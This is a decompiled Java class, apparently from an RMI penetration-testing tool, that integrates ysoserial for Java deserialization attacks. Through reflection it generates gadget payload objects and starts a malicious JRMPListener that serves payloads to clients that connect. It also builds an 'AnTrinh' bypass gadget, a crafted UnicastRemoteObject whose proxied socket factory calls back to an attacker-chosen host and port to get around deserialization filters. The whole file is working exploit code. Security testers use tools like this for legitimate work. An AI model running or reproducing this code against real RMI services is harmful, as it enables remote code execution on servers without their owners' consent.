package eu.tneitzel.rmg.utils;

import eu.tneitzel.rmg.internal.ExceptionHandler;
import eu.tneitzel.rmg.internal.RMGOption;
import eu.tneitzel.rmg.io.Logger;
import eu.tneitzel.rmg.networking.DummySocketFactory;
import java.io.File;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import java.net.BindException;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.NetworkInterface;
import java.net.ServerSocket;
import java.net.SocketException;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.UnknownHostException;
import java.rmi.Remote;
import java.rmi.server.ObjID;
import java.rmi.server.RMIClientSocketFactory;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.rmi.server.UnicastRemoteObject;
import java.util.Arrays;
import javax.net.ServerSocketFactory;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

/* loaded from: input_file:eu/tneitzel/rmg/utils/YsoIntegration.class */
public class YsoIntegration {
    private static String[] bypassGadgets = {"JRMPClient2", "AnTrinh"};

    private static Object generateBypassGadget(String str) {
        Object obj = null;
        String[] split = str.split(":");
        if (split.length != 2 || !split[1].matches("\\d+")) {
            ExceptionHandler.invalidListenerFormat(true);
        }
        try {
            obj = prepareAnTrinhGadget(split[0], Integer.valueOf(split[1]).intValue());
        } catch (Exception e) {
            ExceptionHandler.unexpectedException(e, "bypass object", "generation", true);
        }
        return obj;
    }

    private static URLClassLoader getClassLoader() throws MalformedURLException {
        File file = new File((String) RMGOption.YSO.getValue());
        if (!file.exists()) {
            ExceptionHandler.ysoNotPresent((String) RMGOption.YSO.getValue());
        }
        return new URLClassLoader(new URL[]{file.toURI().toURL()});
    }

    private static InetAddress getLocalAddress(String str) {
        InetAddress inetAddress = null;
        try {
            inetAddress = InetAddress.getByName(str);
            if (!inetAddress.isAnyLocalAddress() && !inetAddress.isLoopbackAddress()) {
                NetworkInterface.getByInetAddress(inetAddress);
            }
        } catch (SocketException | UnknownHostException e) {
            Logger.eprintlnMixedYellow("Specified address", str, "seems not to be available on your host.");
            Logger.eprintlnMixedBlue("Listener address is expected to be", "bound locally.");
            ExceptionHandler.showStackTrace(e);
            RMGUtils.exit();
        }
        return inetAddress;
    }

    public static void createJRMPListener(String str, int i, Object obj) {
        try {
            InetAddress localAddress = getLocalAddress(str);
            Class<?> cls = Class.forName("ysoserial.exploit.JRMPListener", true, getClassLoader());
            Constructor<?> constructor = cls.getConstructor(Integer.TYPE, Object.class);
            Method declaredMethod = cls.getDeclaredMethod("run", new Class[0]);
            Field declaredField = cls.getDeclaredField("ss");
            declaredField.setAccessible(true);
            Logger.printMixedYellow("Creating a", "JRMPListener", "on ");
            Logger.printlnPlainBlue(str + ":" + i + ".");
            Object newInstance = constructor.newInstance(Integer.valueOf(i), obj);
            ((ServerSocket) declaredField.get(newInstance)).close();
            declaredField.set(newInstance, ServerSocketFactory.getDefault().createServerSocket(i, 0, localAddress));
            Logger.printlnMixedBlue("Handing off to", "ysoserial...");
            declaredMethod.invoke(newInstance, new Object[0]);
            System.exit(0);
        } catch (InvocationTargetException e) {
            Throwable cause = ExceptionHandler.getCause(e);
            if (cause instanceof BindException) {
                ExceptionHandler.bindException(e);
                return;
            }
            if (!(cause instanceof IllegalArgumentException)) {
                ExceptionHandler.unexpectedException(e, "JRMPListener", "creation", true);
                return;
            }
            Logger.lineBreak();
            Logger.printlnMixedYellow("Caught", "IllegalArgumentException", "during JRMPListener creation.");
            Logger.printlnMixedBlue("Exception message:", cause.getMessage());
            RMGUtils.exit();
        } catch (BindException e2) {
            ExceptionHandler.bindException(e2);
        } catch (Exception e3) {
            ExceptionHandler.unexpectedException(e3, "JRMPListener", "creation", true);
        }
    }

    public static Object getPayloadObject(String str, String str2) {
        if (Arrays.asList(bypassGadgets).contains(str)) {
            return generateBypassGadget(str2);
        }
        Object obj = null;
        try {
            Method declaredMethod = Class.forName("ysoserial.payloads.ObjectPayload$Utils", true, getClassLoader()).getDeclaredMethod("makePayloadObject", String.class, String.class);
            Logger.print("Creating ysoserial payload...");
            obj = declaredMethod.invoke(null, str, str2);
        } catch (Exception e) {
            Logger.printlnPlain(" failed.");
            Logger.eprintlnMixedYellow("Caught unexpected", e.getClass().getName(), "during gadget generation.");
            Logger.eprintMixedBlue("You probably specified", "a wrong gadget name", "or an ");
            Logger.printlnPlainBlue("invalid gadget argument.");
            ExceptionHandler.showStackTrace(e);
            RMGUtils.exit();
        }
        Logger.printlnPlain(" done.");
        return obj;
    }

    public static Object prepareAnTrinhGadget(String str, int i) throws Exception {
        Constructor declaredConstructor = UnicastRemoteObject.class.getDeclaredConstructor(Integer.TYPE, RMIClientSocketFactory.class, RMIServerSocketFactory.class);
        declaredConstructor.setAccessible(true);
        Field declaredField = UnicastRemoteObject.class.getDeclaredField("ssf");
        declaredField.setAccessible(true);
        RMIServerSocketFactory rMIServerSocketFactory = (RMIServerSocketFactory) Proxy.newProxyInstance(RMIServerSocketFactory.class.getClassLoader(), new Class[]{RMIServerSocketFactory.class, Remote.class}, new RemoteObjectInvocationHandler(new UnicastRef(new LiveRef(new ObjID(123), new TCPEndpoint(str, i), false))));
        UnicastRemoteObject unicastRemoteObject = (UnicastRemoteObject) declaredConstructor.newInstance(0, null, new DummySocketFactory());
        UnicastRemoteObject.unexportObject(unicastRemoteObject, true);
        declaredField.set(unicastRemoteObject, rMIServerSocketFactory);
        return unicastRemoteObject;
    }
}
